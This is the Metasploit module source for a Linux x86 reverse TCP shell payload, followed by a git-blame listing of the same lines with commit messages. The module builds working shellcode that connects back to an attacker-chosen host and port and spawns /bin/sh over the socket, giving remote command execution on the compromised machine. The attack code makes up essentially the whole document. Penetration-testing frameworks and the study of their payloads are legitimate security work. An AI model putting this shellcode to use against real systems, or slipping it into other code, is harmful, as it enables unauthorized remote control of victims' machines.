modules/payloads/singles/linux/x86/shell_reverse_tcp.rb

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'msf/core/handler/reverse_tcp'
require 'msf/base/sessions/command_shell'
require 'msf/base/sessions/command_shell_options'

module MetasploitModule

  CachedSize = 68

  include Msf::Payload::Single
  include Msf::Payload::Linux
  include Msf::Sessions::CommandShellOptions

  def initialize(info = {})
    super(merge_info(info,
      'Name'          => 'Linux Command Shell, Reverse TCP Inline',
      'Description'   => 'Connect back to attacker and spawn a command shell',
      'Author'        => ['Ramon de C Valle', 'joev'],
      'License'       => MSF_LICENSE,
      'Platform'      => 'linux',
      'Arch'          => ARCH_X86,
      'Handler'       => Msf::Handler::ReverseTcp,
      'Session'       => Msf::Sessions::CommandShellUnix
    ))

    register_options([
      OptString.new('CMD', [ true, "The command string to execute", "/bin/sh" ])
    ])
  end

  def generate
    # pad the shell path to a multiple of 4 with slashes
    shell = datastore['CMD']
    remainder = shell.bytes.length % 4
    if remainder == 0 then remainder = 4 end
    shell_padded = ("/" * (4-remainder)) + shell

    "\x31\xdb"             +#   xor ebx,ebx
    "\xf7\xe3"             +#   mul ebx
    "\x53"                 +#   push ebx
    "\x43"                 +#   inc ebx
    "\x53"                 +#   push ebx
    "\x6a\x02"             +#   push byte +0x2
    "\x89\xe1"             +#   mov ecx,esp
    "\xb0\x66"             +#   mov al,0x66 (sys_socketcall)
    "\xcd\x80"             +#   int 0x80
    "\x93"                 +#   xchg eax,ebx
    "\x59"                 +#   pop ecx
    "\xb0\x3f"             +#   mov al,0x3f (sys_dup2)
    "\xcd\x80"             +#   int 0x80
    "\x49"                 +#   dec ecx
    "\x79\xf9"             +#   jns 0x11
    "\x68" + [IPAddr.new(datastore['LHOST'], Socket::AF_INET).to_i].pack('N') + #   push ip addr
    "\x68\x02\x00" + [datastore['LPORT'].to_i].pack('S>') + #   push port
    "\x89\xe1"             +#   mov ecx,esp
    "\xb0\x66"             +#   mov al,0x66 (sys_socketcall)
    "\x50"                 +#   push eax
    "\x51"                 +#   push ecx
    "\x53"                 +#   push ebx
    "\xb3\x03"             +#   mov bl,0x3
    "\x89\xe1"             +#   mov ecx,esp
    "\xcd\x80"             +#   int 0x80
    "\x52"                 +#   push edx

    # Split shellname into 4-byte words and push them one-by-one
    # on to the stack
    shell_padded.bytes.reverse.each_slice(4).map do |word|
      "\x68" + word.reverse.pack('C*')
    end.join +

    "\x89\xe3"             +#   mov ebx,esp
    "\x52"                 +#   push edx
    "\x53"                 +#   push ebx
    "\x89\xe1"             +#   mov ecx,esp
    "\xb0\x0b"             +#   mov al,0xb (execve)
    "\xcd\x80"              #   int 0x80
  end

end
Adding an Id tag and a standard header to all modules 2007-02-18 00:10:39 +00:00			`##`
Fix up comment splats with the correct URI 2014-10-17 11:47:33 -05:00			`# This module requires Metasploit: http://metasploit.com/download`
Redo the boilerplate / splat 2013-10-15 13:50:46 -05:00			`# Current source: https://github.com/rapid7/metasploit-framework`
Adding an Id tag and a standard header to all modules 2007-02-18 00:10:39 +00:00			`##`

worked on payload encoding, exploit driver wrapper, platforms updates, spoon would probably hate it 2005-07-13 18:06:12 +00:00			`require 'msf/core'`
			`require 'msf/core/handler/reverse_tcp'`
it lives, major changes, fixed bugs, exploiting works with the test exploit 2005-07-16 07:32:11 +00:00			`require 'msf/base/sessions/command_shell'`
adds scripting for command shell sessions 2010-02-24 01:19:59 +00:00			`require 'msf/base/sessions/command_shell_options'`
worked on payload encoding, exploit driver wrapper, platforms updates, spoon would probably hate it 2005-07-13 18:06:12 +00:00
use MetasploitModule as a class name 2016-03-08 14:02:44 +01:00			`module MetasploitModule`
worked on payload encoding, exploit driver wrapper, platforms updates, spoon would probably hate it 2005-07-13 18:06:12 +00:00
Include cached size. 2016-02-18 20:29:42 -06:00			`CachedSize = 68`

Retab modules 2013-08-30 16:28:54 -05:00			`include Msf::Payload::Single`
			`include Msf::Payload::Linux`
			`include Msf::Sessions::CommandShellOptions`
Added missing Linux x86 payload modules from unixasm 2008-10-23 02:19:50 +00:00
Retab modules 2013-08-30 16:28:54 -05:00			`def initialize(info = {})`
			`super(merge_info(info,`
			`'Name' => 'Linux Command Shell, Reverse TCP Inline',`
			`'Description' => 'Connect back to attacker and spawn a command shell',`
Make x86/shell_reverse_tcp's shell path configurable. 2016-02-18 20:24:30 -06:00			`'Author' => ['Ramon de C Valle', 'joev'],`
Retab modules 2013-08-30 16:28:54 -05:00			`'License' => MSF_LICENSE,`
			`'Platform' => 'linux',`
			`'Arch' => ARCH_X86,`
			`'Handler' => Msf::Handler::ReverseTcp,`
Make x86/shell_reverse_tcp's shell path configurable. 2016-02-18 20:24:30 -06:00			`'Session' => Msf::Sessions::CommandShellUnix`
			`))`

			`register_options([`
			`OptString.new('CMD', [ true, "The command string to execute", "/bin/sh" ])`
			`])`
			`end`

			`def generate`
			`# pad the shell path to a multiple of 4 with slashes`
			`shell = datastore['CMD']`
			`remainder = shell.bytes.length % 4`
Save some bytes on the padded string. 2016-02-18 20:36:52 -06:00			`if remainder == 0 then remainder = 4 end`
Make x86/shell_reverse_tcp's shell path configurable. 2016-02-18 20:24:30 -06:00			`shell_padded = ("/" * (4-remainder)) + shell`

			`"\x31\xdb" +# xor ebx,ebx`
			`"\xf7\xe3" +# mul ebx`
			`"\x53" +# push ebx`
			`"\x43" +# inc ebx`
			`"\x53" +# push ebx`
			`"\x6a\x02" +# push byte +0x2`
			`"\x89\xe1" +# mov ecx,esp`
			`"\xb0\x66" +# mov al,0x66 (sys_socketcall)`
			`"\xcd\x80" +# int 0x80`
			`"\x93" +# xchg eax,ebx`
			`"\x59" +# pop ecx`
			`"\xb0\x3f" +# mov al,0x3f (sys_dup2)`
			`"\xcd\x80" +# int 0x80`
			`"\x49" +# dec ecx`
			`"\x79\xf9" +# jns 0x11`
Fix old comment. 2016-02-19 19:08:38 -06:00			`"\x68" + [IPAddr.new(datastore['LHOST'], Socket::AF_INET).to_i].pack('N') + # push ip addr`
			`"\x68\x02\x00" + [datastore['LPORT'].to_i].pack('S>') + # push port`
Make x86/shell_reverse_tcp's shell path configurable. 2016-02-18 20:24:30 -06:00			`"\x89\xe1" +# mov ecx,esp`
			`"\xb0\x66" +# mov al,0x66 (sys_socketcall)`
			`"\x50" +# push eax`
			`"\x51" +# push ecx`
			`"\x53" +# push ebx`
			`"\xb3\x03" +# mov bl,0x3`
			`"\x89\xe1" +# mov ecx,esp`
			`"\xcd\x80" +# int 0x80`
			`"\x52" +# push edx`

			`# Split shellname into 4-byte words and push them one-by-one`
			`# on to the stack`
			`shell_padded.bytes.reverse.each_slice(4).map do \|word\|`
			`"\x68" + word.reverse.pack('C*')`
			`end.join +`

			`"\x89\xe3" +# mov ebx,esp`
			`"\x52" +# push edx`
			`"\x53" +# push ebx`
			`"\x89\xe1" +# mov ecx,esp`
			`"\xb0\x0b" +# mov al,0xb (execve)`
			`"\xcd\x80" # int 0x80`
Retab modules 2013-08-30 16:28:54 -05:00			`end`
worked on payload encoding, exploit driver wrapper, platforms updates, spoon would probably hate it 2005-07-13 18:06:12 +00:00
Added missing Linux x86 payload modules from unixasm 2008-10-23 02:19:50 +00:00			`end`